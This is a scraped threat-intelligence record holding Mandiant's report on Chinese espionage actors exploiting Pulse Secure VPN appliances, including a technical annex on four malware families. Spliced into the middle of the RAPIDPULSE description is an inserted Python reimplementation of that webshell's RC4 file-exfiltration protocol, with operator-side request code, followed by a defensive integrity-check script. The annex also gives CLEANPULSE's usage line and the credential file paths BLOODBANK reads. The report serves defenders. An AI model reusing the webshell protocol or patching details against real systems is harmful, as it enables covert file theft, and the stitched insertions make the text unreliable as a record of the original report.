"fireeye", "title": "Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T00:00:00", "id": "FIREEYE:C650A7016EEAD895903FB350719E53E3", "href": "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-29T03:23:15", "description": "On April 20, 2021, Mandiant published detailed results of our investigations into compromised Pulse Secure devices by suspected Chinese espionage operators. 
This blog post is intended to provide an update on our findings, give additional recommendations to network defenders, and discuss potential implications for U.S.-China strategic relations.

 * Mandiant continues to gather evidence and respond to intrusions involving compromises of Pulse Secure VPN appliances at organizations across the defense, government, high tech, transportation, and financial sectors in the U.S. and Europe (Figure 1).
 * Reverse engineers on the FLARE team have identified four additional code families specifically designed to manipulate Pulse Secure devices.
 * We now assess that espionage activity by UNC2630 and UNC2717 supports key Chinese government priorities. Many compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives outlined in China's recent 14th Five Year Plan.
 * While there is evidence of data theft at many organizations, we have not directly observed the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi [agreement](<https://obamawhitehouse.archives.gov/the-press-office/2015/09/25/fact-sheet-president-xi-jinpings-state-visit-united-states>).
 * Mandiant Threat Intelligence assesses that Chinese cyber espionage activity has demonstrated a higher tolerance for risk and is less constrained by diplomatic pressures than previously characterized.

_Figure 1: Organizations with compromised Pulse Secure devices by vertical and geographic location_

Pulse Secure continues to work closely with Mandiant, affected customers, government partners, and other forensic experts to address these issues. Pulse Secure's parent company, Ivanti, has released patches to proactively address software vulnerabilities and issued updated [Security Advisories](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>) and [Knowledge Articles](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to assist customers. (Please see the Forensics, Remediation, and Hardening Guidelines section for additional details.)

#### UNC2630 and UNC2717 Tradecraft and Response to Disclosure

Mandiant is tracking 16 malware families exclusively designed to infect Pulse Secure VPN appliances and used by several cyber espionage groups which we believe are affiliated with the Chinese government. Between April 17 and April 20, 2021, Mandiant incident responders observed UNC2630 access dozens of compromised devices and remove webshells like ATRIUM and SLIGHTPULSE.

 * Under certain conditions, the Integrity Checker Tool (ICT) will show no evidence of compromise on appliances which may have had historical compromise. This false negative may be returned because the ICT cannot scan the rollback partition. If a backdoor or persistence patcher exists on the rollback partition and a Pulse Secure appliance is rolled back to the prior version, the backdoor(s) will be present on the appliance. Please see the Forensics, Remediation, and Hardening Guidelines section for important information regarding the ICT and upgrade process.
 * In at least one instance, UNC2630 deleted their webshell(s) but did not remove the persistence patcher, making it possible to regain access when the device was upgraded. The remaining persistence patcher causes the malicious code to be executed later during a system upgrade, re-inserts webshell logic into various files on the appliance, and recompromises the device.
 * It is unusual for Chinese espionage actors to remove a large number of backdoors across several victim environments on or around the time of public disclosure. This action displays an interesting concern for operational security and a sensitivity to publicity.

Both UNC2630 and UNC2717 display advanced tradecraft and go to impressive lengths to avoid detection. The actors modify file timestamps and regularly edit or delete forensic evidence such as logs, web server core dumps, and files staged for exfiltration. They also demonstrate a deep understanding of network appliances and advanced knowledge of a targeted network. This tradecraft can make it difficult for network defenders to establish a complete list of tools used, credentials stolen, the initial intrusion vector, or the intrusion start date.

#### Updates from Incident Response Investigations

We continue to suspect that multiple groups including UNC2630 and UNC2717 are responsible for this activity, despite the use of similar exploits and tools. There is a high degree of variation in attacker actions within victim environments, with actors inconsistently using a combination of tools and command and control IP addresses.

Reverse engineers on the FLARE team have identified four additional malware families specifically designed to manipulate Pulse Secure devices (Table 1). These utilities have similar functions to the 12 previously documented malware families: harvesting credentials and sensitive system data, allowing arbitrary file execution, and removing forensic evidence. Please see the Technical Annex for detailed analysis of these code families.

| Malware Family | Description | Actor |
|---|---|---|
| BLOODMINE | Utility for parsing Pulse Connect Secure log files. It extracts information related to logins, Message IDs and Web Requests and copies the relevant data to another file. | UNC2630 |
| BLOODBANK | Credential theft utility that parses two files containing password hashes or plaintext passwords and expects an output file to be given at the command prompt. | UNC2630 |
| CLEANPULSE | Memory patching utility that may be used to prevent certain log events from occurring. It was found in close proximity to an ATRIUM webshell. | UNC2630 |
| RAPIDPULSE | Webshell capable of arbitrary file read. As is common with other webshells, RAPIDPULSE exists as a modification to a legitimate Pulse Secure file. RAPIDPULSE can serve as an encrypted file downloader for the attacker. | UNC2630 |

_Table 1: New malware families identified_

_Initial Compromise_

The actors leveraged several vulnerabilities in Pulse Secure VPN appliances. Mandiant observed the use of the recently patched vulnerability CVE-2021-22893 to compromise fully patched Pulse Secure appliances, as well as previously disclosed vulnerabilities from 2019 and 2020. In many cases it was not possible to determine the initial exploitation vector and timeframe, either because the actors altered or deleted forensic evidence, or because the appliance had undergone subsequent code upgrades that destroyed evidence related to the initial exploitation.

_Establish Foothold_

In some cases, Mandiant observed the actors create their own Local Administrator account outside of established credential management controls on Windows servers of strategic value. This allowed the actor to maintain access to systems with short-cycle credential rotation policies and provided a sufficient level of access to operate freely within their target environment. The actors also maintained their foothold in the targeted environments exclusively through Pulse Secure webshells and malware, without relying on backdoors deployed on internal Windows or Linux endpoints.

_Escalate Privileges_

Mandiant observed the actors use three credential harvesting techniques on Windows systems:

 * Targeting of clear text passwords and hashes from memory using the credential harvesting tool Mimikatz. Rather than copying the binary to the target system and executing it there, the actor exposed it through an RDP mapped drive: Mandiant saw evidence of the Mimikatz binary on the source system of the RDP session (i.e. the threat actor's system that was connected to the VPN).
 * Copying and exfiltration of the SAM, SECURITY, and SYSTEM registry hives, which contained cached NTLM hashes for Local and Domain accounts.
 * Leveraging the Windows Task Manager process to target the Local Security Authority Subsystem Service (LSASS) process memory for NTLM hashes.

In addition to these privilege escalation techniques, the actors specifically targeted separate privileged accounts belonging to individuals whose unprivileged accounts were previously compromised (likely through the Pulse Secure credential harvesting malware families). It is unclear how the account associations were made by the actor.

_Internal Reconnaissance_

Mandiant found evidence that the actors renamed their own workstations that they connected to the VPN of victim networks to mimic the naming convention of their target environment. This practice aligns with the actor's objective of long-term persistence and evading detection, and demonstrates a familiarity with the internal hostnames in the victim environment.

The actors operated solely by utilizing Windows-based utilities to carry out tasks. Some of the utilities observed were net.exe, quser.exe, powershell.exe, powershell_ise.exe, findstr.exe, netstat.exe, cmd.exe, reg.exe and tasklist.exe.

_Move Laterally_

Most lateral movement originated from compromised Pulse Secure VPN appliances to internal systems within the environment. While connected to the Pulse VPN appliance, the actor's system was assigned an IP address from the Pulse VPN DHCP pool, and they moved laterally throughout the environments by leveraging the Remote Desktop Protocol (RDP), the Secure Shell Protocol (SSH), and browser-based communication to HTTPS hosted resources. The actors also accessed other resources such as Microsoft M365 cloud environments using stolen credentials they had previously acquired.

Mandiant also observed the actors targeting ESXi host servers. The actor used the web interface to enable SSH on ESXi hosts where it had previously been disabled. When their operations on the system were finished, the actors disabled SSH on the ESXi host again and cleared or preemptively disabled all relevant logging associated with the performed activities. This includes authentication, command history, and message logging on the system.

_Maintain Presence_

Mandiant observed the threat actor maintain persistence by compromising the upgrade process on the Pulse Secure Appliance. Persistence was primarily achieved by modifying the legitimate DSUpgrade.pm file to install the ATRIUM webshell across each upgrade performed by an administrator. The actor likely chose DSUpgrade.pm to host their patch logic as it is a core file in the system upgrade procedure, ensuring the patch is applied during updates. The patcher modifies content in /tmp/data, as this directory holds the extracted upgrade image the newly upgraded system will boot into. This results in a persistence mechanism which allows the actor to maintain access to the system across updates.

The actors also achieved persistence in other cases by prepending a bash script to the file /bin/umount, normally used to unmount a Linux filesystem. This binary was targeted by the actor because it is executed by the Pulse Secure appliance during a system upgrade. The actor's script verifies that the umount binary executes with a specific set of arguments, which are identical to the arguments used by the Pulse Secure appliance to execute the binary. The inserted malicious bash script remounts the filesystem as read-write and iterates through a series of bash routines to inject the ATRIUM webshell, hide SLOWPULSE from a legacy file integrity bash script, add or remove itself from the umount file, and validate that the web process is running after a reboot before returning the filesystem to read-only.

_Complete Mission_

The threat actor's objectives appear to be stealing credentials, maintaining long-term persistent access to victim networks, and accessing or exfiltrating sensitive data. Mandiant has observed the attackers:

 * Staging data related to sensitive projects, often in C:\Users\Public
 * Naming exfiltration archives to resemble Windows Updates (KB) or to match the format KB<digits>.zip
 * Using the JAR/ZIP file format for data exfiltration
 * Deleting exfiltrated archives

Analysis of new malware families is included in the Technical Annex to enable defenders to quickly assess if their respective appliances have been affected. Relevant MITRE ATT&CK techniques, Yara rules and hashes are published on [Mandiant's GitHub page](<https://github.com/mandiant/pulsesecure_exploitation_countermeasures>).

#### Forensics, Remediation, and Hardening Guidelines

To begin an investigation, Pulse Secure users should contact their Customer Support Representative for assistance completing the following steps:

 1. Capture memory and a forensic image of the appliance
 2. Run the Pulse Integrity Checker Tool found online
 3. Request a decrypted image of each partition and a memory dump

To remediate a compromised Pulse Secure appliance:

 1. Caution must be taken when determining if a Pulse Secure device was compromised at any previous date. If the Integrity Checker Tool (ICT) was not run before the appliance was updated, the only evidence of compromise will exist in the system rollback partition, which cannot be scanned by the ICT. If an upgrade was performed without first using the ICT, a manual inspection of the rollback partition is required to determine if the device was previously compromised.
 2. To ensure that no malicious logic is copied to a clean device, users must perform upgrades from the appliance console rather than the web interface. The console upgrade process follows a separate code path that will not execute files such as DSUpgrade.pm.
 3. Previous versions of the ICT will exit if run on an unsupported software version. For every ICT scan, ensure that the ICT would have supported the device's version number.
 4. Reset all passwords in the environment.
 5. Upgrade to the most recent software version.

To secure the appliance and assist with future investigations, consider implementing the following:

 1. Enable unauthenticated logging and configure syslog for Events, User & Admin Access
 2. Forward all logs to a central log repository
 3. Review logs for unusual authentications and evidence of exploitation
 4. Regularly run the Integrity Checker Tool
 5. Apply patches as soon as they are made available

#### Geopolitical Context and Implications for U.S.-China Relations

In collaboration with intelligence analysts at BAE Systems Applied Intelligence, Mandiant has identified dozens of organizations across the defense, government, telecommunications, high tech, education, transportation, and financial sectors in the U.S. and Europe that have been compromised via vulnerabilities in Pulse Secure VPNs. Historic Mandiant and BAE investigations identified a significant number of these organizations as previous APT5 targets.

Notably, compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives as outlined in China's 14th Five Year Plan. Many manufacturers also compete with Chinese businesses in the high tech, green energy, and telecommunications sectors. Despite this, we have not directly observed the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi agreement.

Targets of Chinese cyber espionage operations are often selected for their alignment with national strategic goals, and there is a strong correlation between pillar industries listed in policy white papers and targets of Chinese cyber espionage activity.

China has outlined eight key areas of vital economic interest for development and production which it views as essential to maintaining global competitiveness, under the following categories: energy, healthcare, railway transportation, telecommunications, national defense and stability, advanced manufacturing, network power, and sports and culture.

_Historical Context_

In the [_Red Line Drawn_](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-china-espionage.pdf>) report, Mandiant documented a significant decline in the volume of Chinese cyber espionage activity in 2014 and assessed that the restructuring of China's military and civilian intelligence agencies significantly impacted Chinese cyber operations. Then, in September 2015, President Xi of China concluded a bilateral agreement with U.S. President Obama to prohibit state-sponsored theft of intellectual property for the purpose of providing commercial advantage. Commercial IP theft has historically been a prominent characteristic of Chinese cyber espionage activity.

In 2018 we conducted an extensive [review](<https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-executive-s05-redline-redrawn.pdf>) of Chinese cyber espionage operations, both before and after the official announcement of the PLA reforms and the bilateral agreement, to determine if there were any corresponding changes in the tactics, techniques, and procedures (TTPs) used during Chinese cyber espionage operations. We observed two important changes: in the type of information stolen, and in the geographic distribution of the targets.

 * Despite examining hundreds of incidents from January 2016 through mid-2019, we did not find definitive evidence of purely commercial application intellectual property theft in the US. Recent [indictments](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>) by the US Department of Justice suggest that this theft did occur. While we observed other malicious activity, including geopolitical targeting, theft of intellectual property with military applications, and theft of confidential business information, we did not find evidence that these cyber operations violated the Obama-Xi agreement.
 * Between January 2016 and mid-2019, the geographic focus of Chinese cyber operations shifted dramatically to Asia and away from the U.S. and Europe. While the U.S. remained the single most frequently targeted country, it became a much smaller percentage of observed activity. From 2012–2015, U.S. targeting constituted nearly 70 percent of all observed Chinese cyber espionage, while from January 2016 through August 2019, U.S. targeting fell to approximately 20 percent of Chinese activity. Targeting of Europe represented a similar proportion of overall Chinese activity to targeting of the Americas.

_Changes in Chinese Espionage Activity between 2019 and 2021_

Based on developments observed between 2019 and 2021, Mandiant Threat Intelligence assesses that most Chinese APT actors now concentrate on lower-volume but more sophisticated, stealthier operations collecting strategic intelligence to support Chinese strategic political, military, and economic goals. While some of the technical changes may be the result of the restructuring of China's military and civilian organizations, some changes possibly reflect larger technical trends in cyber operations overall.

 * Before the reorganization, it was common to observe multiple Chinese espionage groups targeting the same organization, often targeting the same types of information. Post-2015, this duplication of effort is rare.
 * Chinese espionage groups developed more efficient and purposeful targeting patterns by moving away from spearphishing and end-user software vulnerabilities and instead exploiting networking devices and web-facing applications in novel ways. Chinese APT actors also began to leverage supply chain vulnerabilities and to target third party providers to gain access to primary targets.
 * Recently observed Chinese cyber espionage activity exhibits an increased diligence in operational security, familiarity with network defender investigation techniques, and cognizance of the forensic evidence they leave behind.
 * We observe the resurgence of older Chinese espionage groups, including APT4 and APT5, after long periods of dormancy, while currently active groups engage in frequent and widespread campaigns.

_Redline Withdrawn?_

The Obama-Xi agreement prohibits the theft of intellectual property with purely commercial applications for the purpose of gaining a competitive advantage. It does not cover government or diplomatic information, sensitive business communications, IT data, PII, or intellectual property with military or dual use applications.

 * We have direct evidence of UNC2630, UNC2717 and other Chinese APT actors stealing credentials, email communications, and intellectual property with dual commercial and military applications.
 * Throughout our investigations, we did not directly observe the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi agreement.

Given the narrow definition of commercial intellectual property theft and the limited availability of forensic evidence, it is possible that our assessment will change with the discovery of new information.

Evidence collected by Mandiant over the past decade suggests that norms and diplomatic agreements do not significantly limit China's use of its cyber threat capabilities, particularly when serving high-priority missions.

The greater ambition and risk tolerance demonstrated by Chinese policymakers since 2019 indicates that the tempo of Chinese state-sponsored activity may increase in the near future and that the Chinese cyber threat apparatus presents a renewed and serious threat to US and European commercial entities.

#### Acknowledgements

Mandiant would like to thank analysts at BAE Systems Applied Intelligence, Stroz Friedberg, and Pulse Secure for their hard work, collaboration and partnership. The team would also like to thank Scott Henderson, Kelli Vanderlee, Jacqueline O'Leary, Michelle Cantos, and all the analysts who worked on Mandiant's _Red Line Redrawn_ project. The team would also like to thank Mike Dockry, Josh Villanueva, Keith Knapp, and all the incident responders who worked on these engagements.

#### Additional Resources

 * [CISA Alert (AA21-110A): Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa-21-110a>)
 * [Pulse Secure Advisory SA44101: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)
 * [Pulse Secure Advisory SA44784: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>)
 * [Pulse Secure Customer FAQ KB44764: PCS Security Integrity Tool Enhancements](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44764>)
 * [Pulse Secure KB44755: Pulse Connect Secure (PCS) Integrity Assurance](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>)

#### Detecting the Techniques

The following table contains specific FireEye product detection names for the malware families associated with this updated information.

| Platform(s) | Detection Name |
|---|---|
| Network Security, Email Security, Detection On Demand, Malware File Scanning, Malware File Storage Scanning | FE_APT_Tool_Linux32_BLOODMINE_1, FE_APT_Tool_Linux_BLOODMINE_1, FE_APT_Tool_Linux32_BLOODBANK_1, FE_APT_Tool_Linux_BLOODBANK_1, FE_APT_Tool_Linux32_CLEANPULSE_1, FE_APT_Tool_Linux_CLEANPULSE_1, FE_APT_Webshell_PL_RAPIDPULSE_1, FEC_APT_Webshell_PL_RAPIDPULSE_1 |
| Endpoint Security | Real-Time Detection (IOC): BLOODBANK (UTILITY), BLOODMINE (UTILITY) |
| Helix | Establish Foothold: WINDOWS METHODOLOGY [User Account Created], WINDOWS METHODOLOGY [User Created - Net Command]. Escalate Privileges: WINDOWS METHODOLOGY [Mimikatz Args], WINDOWS METHODOLOGY [Invoke-Mimikatz Powershell Artifacts], WINDOWS METHODOLOGY [LSASS Memory Access], WINDOWS METHODOLOGY [LSASS Generic Dump Activity]. Internal Reconnaissance: WINDOWS ANALYTICS [Recon Commands]. Move Laterally: WINDOWS ANALYTICS [Abnormal RDP Logon], OFFICE 365 ANALYTICS [Abnormal Logon] |

#### Technical Annex

_BLOODMINE_

BLOODMINE is a utility for parsing Pulse Connect Secure log files. It extracts information related to logins, Message IDs and Web Requests and copies the relevant data to another file.

The sample takes three command line arguments:

 1. Filename to read
 2. Filename to write
 3. Timeout interval

It parses the input file for the following login status codes:

 * AUT31504
 * AUT24414
 * AUT22673
 * AUT22886
 * AUT23574

It also parses the input file for the web result code WEB20174. If it finds a web result code, it looks for the following file extensions:

 * .css
 * .jpg
 * .png
 * .gif
 * .ico
 * .js
 * .jsp

These format strings indicate the type of data that is collected from the log entries:

 * Web login, IP: %s, User: %s, Realm: %s, Roles: %s, Browser: %s
 * Agent login, IP: %s, User: %s, Realm: %s, Roles: %s, Client: %s
 * Logout, IP: %s, User: %s, Realm: %s, Roles: %s
 * Session end, IP: %s, User: %s, Realm: %s, Roles: %s
 * New session, IP: %s, User: %s, Realm: %s, Roles: %s, New IP: %s
 * Host check, Policy: %s
 * WebRequest completed, IP: %s, User: %s, Realm: %s, Roles: %s, %s to %s://%s:%s/%s from %s

_BLOODBANK_

BLOODBANK is a credential theft utility that parses two LMDB (Lightning Memory-Mapped Database) files and expects an output file to be given at the command prompt. BLOODBANK takes advantage of a legitimate process that supports Single Sign On functionality and looks for plaintext passwords when they are briefly loaded in memory.

The utility parses the following two files containing password hashes or plaintext passwords:

 * /home/runtime/mtmp/lmdb/data0/data.mdb
 * /home/runtime/mtmp/system

BLOODBANK expects an output file as a command line parameter, otherwise it prints a file open error. It contains the following strings, which it likely searches for and extracts:

 * PRIMARY
 * SECONDARY
 * remoteaddr
 * user@
 * logicUR
 * logicTim
 * passw@
 * userAge
 * realm
 * Sourc

_CLEANPULSE_

CLEANPULSE is a memory patching utility that may be used to prevent certain log events from occurring. The utility inserts two strings from the command line into the target process and patches code to conditionally circumvent a function call in the original executable.

| File Name | File Type | Size | Compile Time |
|---|---|---|---|
| dsrlog | ELF.X86 | 13332 | |

The utility expects to be run from the command line as follows:

```
dsrlog <pid> <code2_string> <code3_string> <command>
```

Where <pid> is the ID of the process to patch in memory, <code2_string> and <code3_string> are two strings to write into the target process, and <command> is either 'e' or 'E' for installation or 'u' or 'U' for uninstallation.

During installation (using the 'e' or 'E' <command>), the <code2_string> and <code3_string> command line strings are written to the target process at hard-coded memory addresses, a small amount of code is written, and a jump instruction to the code snippet is patched into the memory of the target process. The added code checks whether an argument is equal to either of the <code2_string> or <code3_string> strings and, if so, skips a function call in the target process.

During uninstall (using the 'u' or 'U' <command>), the patch jump location is overwritten with what appears to be the original 8 bytes of instructions, and the two additional memory buffers and the code snippet appear to be overwritten with zeros.

The CLEANPULSE utility is highly specific to a victim environment. It does not contain any validation code when patching (i.e. it does not verify that the code at the address is what it expects before modifying it), and it contains hard-coded addresses to patch.

The target code to patch appears to be the byte sequence 89 4C 24 08 FF 52 04. This sequence appears as the last bytes of the patched code, and it is restored when the uninstall 'u' command is given.

These bytes correspond to the following two instructions:

```
.data:0804B138 89 4C 24 08    mov  [esp+8], ecx
.data:0804B13C FF 52 04       call dword ptr [edx+4]
```

This byte sequence occurs at the hard-coded patch address the utility expects in dslogserver. Based on status and error messages in nearby functions, the executable dslogserver appears to be related to log event handling, and the purpose of the CLEANPULSE utility may be to prevent certain events from being logged.

There are several un-referenced functions that appear to have been taken from the open source project PUPYRAT. It is likely that the actor re-purposed this open source code, using PUPYRAT as a simple template project.

_RAPIDPULSE_

RAPIDPULSE is a webshell capable of arbitrary file read. As is common with other webshells, RAPIDPULSE exists as a modification to a legitimate Pulse Secure file.

The webshell modifies the legitimate file's main routine, which compares the HTTP query parameter named deviceid to a specific hard-coded key value.
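The RAPIDPULSE exchange worked through in code, as an added example reconstructed from this annex (it is not Mandiant's code and not the webshell itself): the operator sends deviceid set to the gate value and hmacTime carrying the RC4-encrypted filename; the webshell reads that file, RC4-encrypts it with the same key and base64-encodes it into the response body. The gate value, the RC4 key, the stand-in file contents and the use of base64 to carry the hmacTime ciphertext in the URL are assumptions (the annex does not say how that ciphertext is transported). The defender-side functions show what an investigator can reconstruct from web logs and captured responses once the key has been recovered from the modified Pulse Secure file.

```python
import base64
from typing import Optional
from urllib.parse import parse_qs, urlencode

# Constructed values: the real webshell's gate value and RC4 key are not
# known here and would be recovered from the modified CGI on the appliance.
GATE_VALUE = "a1b2c3d4e5f6"      # value the deviceid parameter must equal
RC4_KEY = b"example-rc4-key"      # key used for both request and response

# Constructed stand-in for the appliance filesystem; nothing is read from disk.
FAKE_FS = {
    "/data/runtime/etc/ssl/ssl.key": b"-----BEGIN PRIVATE KEY-----\n(constructed)\n-----END PRIVATE KEY-----\n",
    "/home/runtime/mtmp/system": b"<constructed stand-in for the LMDB blob>",
}


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are the same op."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # keystream generation + XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def operator_request(path: str) -> str:
    """Operator side: query string asking the webshell for `path`.
    hmacTime = base64(RC4(key, filename)); base64 is an assumption."""
    token = base64.b64encode(rc4(RC4_KEY, path.encode())).decode()
    return urlencode({"deviceid": GATE_VALUE, "hmacTime": token})


def webshell_handle(query: str) -> Optional[str]:
    """Appliance side. Returns the response body, or None when the deviceid
    gate fails (in which case the legitimate code path would run instead)."""
    params = parse_qs(query)
    if params.get("deviceid", [""])[0] != GATE_VALUE:
        return None
    filename = rc4(RC4_KEY, base64.b64decode(params["hmacTime"][0])).decode()
    content = FAKE_FS.get(filename, b"")      # real webshell: open/read the file
    return base64.b64encode(rc4(RC4_KEY, content)).decode()


def recover_requested_path(query: str) -> str:
    """Defender side: from a logged request line, which file was asked for."""
    params = parse_qs(query)
    return rc4(RC4_KEY, base64.b64decode(params["hmacTime"][0])).decode()


def decode_response(body: str) -> bytes:
    """Defender side: from a captured response body, what actually left."""
    return rc4(RC4_KEY, base64.b64decode(body))


if __name__ == "__main__":
    q = operator_request("/data/runtime/etc/ssl/ssl.key")
    print("request :", q)
    body = webshell_handle(q)
    print("response:", body)
    print("file read:", recover_requested_path(q))
    print("contents :", decode_response(body))
```

With the key in hand, running recover_requested_path over every web log entry whose query carries deviceid and hmacTime turns the web logs into a list of files the actor pulled, which is exactly the inventory (private keys, the LMDB credential store) that drives the "reset all passwords" step in the remediation guidance above.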
If the parameter matches, the sample uses an RC4 key to decrypt the HTTP query parameter named hmacTime. This decrypted value is a filename, which the sample then opens, reads, RC4-encrypts with the same key, base64-encodes, and writes to stdout. The appliance redirects stdout as the response to the HTTP request. This serves as an encrypted file download for the attacker.

#### Integrity Checker Tool and Other Validation Checks

In our public report, we noted two code families that manipulate check_integrity.sh, a legitimate script used during a normal system upgrade. This validation script was modified by the actor to exit early so that it would not perform the intended checks.

Per Ivanti, the validation provided by check_integrity.sh is a separate validation feature and not the same as the [Integrity Checker Tool (ICT)](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) available on their website. They recommend that organizations use the online ICT to confirm that hashes of files on their Pulse Secure devices match Ivanti's list of known good hashes.
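As an added example, not Ivanti's ICT and not tooling from Mandiant, the following script applies the same known-good-hash idea offline to decrypted partition images, and covers the two gaps discussed on this page: it scans the rollback partition as well as the active one, and it flags native binaries that no longer begin with an ELF header, which is what prepending a shell script to /bin/umount produces. It also reports files that are not in the manifest at all, which is how a dropped webshell shows up. The manifest format, the DSUpgrade.pm and CGI paths, and every file's contents are constructed for the demo; a real run would use the vendor's hash list for the exact version installed on each partition and the mounted images obtained in step 3 of the investigation guidance above.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

ELF_MAGIC = b"\x7fELF"
NATIVE_BINARY_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")

# Constructed stand-ins for appliance files. Only /bin/umount is a path the
# page names; the DSUpgrade.pm and CGI locations are assumptions, and no
# content below is real Pulse Secure code.
CLEAN_FILES: Dict[str, bytes] = {
    "/bin/umount": ELF_MAGIC + b"\x01\x01\x01\x00" + b"\x00" * 8 + b"<umount machine code>",
    "/home/perl/DSUpgrade.pm": b"package DSUpgrade;\n# legitimate upgrade logic (constructed)\n1;\n",
    "/home/webserver/htdocs/dana-na/auth/welcome.cgi": b"#!/home/bin/perl\n# legitimate CGI (constructed)\n",
}
# The rollback partition in this demo is the one that was compromised and then
# upgraded over: patched DSUpgrade.pm, script prepended to umount, dropped file.
ROLLBACK_FILES = dict(CLEAN_FILES)
ROLLBACK_FILES["/bin/umount"] = (
    b"#!/bin/sh\n# constructed stand-in for the prepended stage\n" + CLEAN_FILES["/bin/umount"]
)
ROLLBACK_FILES["/home/perl/DSUpgrade.pm"] = (
    CLEAN_FILES["/home/perl/DSUpgrade.pm"] + b"# constructed stand-in for the patcher hook\n"
)
ROLLBACK_FILES["/home/webserver/htdocs/dana-na/auth/dropped.cgi"] = b"# constructed stand-in for a webshell\n"


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check_partition(root: Path, manifest: Dict[str, str]) -> List[str]:
    """Findings for one mounted, decrypted partition root. `manifest` maps
    appliance-absolute paths to the expected sha256 hex digest."""
    findings: List[str] = []
    for rel, expected in manifest.items():
        p = root / rel.lstrip("/")
        if not p.is_file():
            findings.append(f"MISSING {rel}")
            continue
        actual = sha256_of(p)
        if actual != expected:
            findings.append(f"MODIFIED {rel} sha256={actual[:16]}...")
        # A native binary whose first bytes are not the ELF magic has had
        # something (a shell script, in the umount case) put in front of it.
        if rel.startswith(NATIVE_BINARY_DIRS):
            with p.open("rb") as f:
                head = f.read(4)
            if head != ELF_MAGIC:
                findings.append(f"NON-ELF-PREFIX {rel} head={head!r}")
    # Anything on disk that the manifest does not know about is worth a look.
    for p in root.rglob("*"):
        if p.is_file():
            rel = "/" + p.relative_to(root).as_posix()
            if rel not in manifest:
                findings.append(f"UNEXPECTED {rel}")
    return findings


def triage(active: Path, rollback: Path, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan both partitions. A clean active partition next to a dirty rollback
    partition is the 'upgraded before running the ICT' case the page warns about."""
    return {"active": check_partition(active, manifest),
            "rollback": check_partition(rollback, manifest)}


def write_tree(root: Path, files: Dict[str, bytes]) -> None:
    for rel, content in files.items():
        p = root / rel.lstrip("/")
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content)


def build_demo() -> Tuple[Path, Path, Dict[str, str]]:
    """Lay out the two constructed partition images in a temp dir and derive the
    manifest from the clean set (in practice it is the vendor's list for that version)."""
    base = Path(tempfile.mkdtemp(prefix="pcs-triage-"))
    active, rollback = base / "active", base / "rollback"
    write_tree(active, CLEAN_FILES)
    write_tree(rollback, ROLLBACK_FILES)
    manifest = {rel: hashlib.sha256(data).hexdigest() for rel, data in CLEAN_FILES.items()}
    return active, rollback, manifest


if __name__ == "__main__":
    a, r, m = build_demo()
    for part, findings in triage(a, r, m).items():
        print(f"[{part}] {'clean' if not findings else ''}")
        for line in findings:
            print("   ", line)
```

Two caveats carry over from the page. The manifest must match the software version on the partition being scanned, or every file reports as MODIFIED, which is the same version-support issue noted for the ICT. And a hash check only sees the filesystem: a CLEANPULSE-style in-memory patch to dslogserver leaves the on-disk binary intact, which is why the memory capture in step 1 is not optional.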
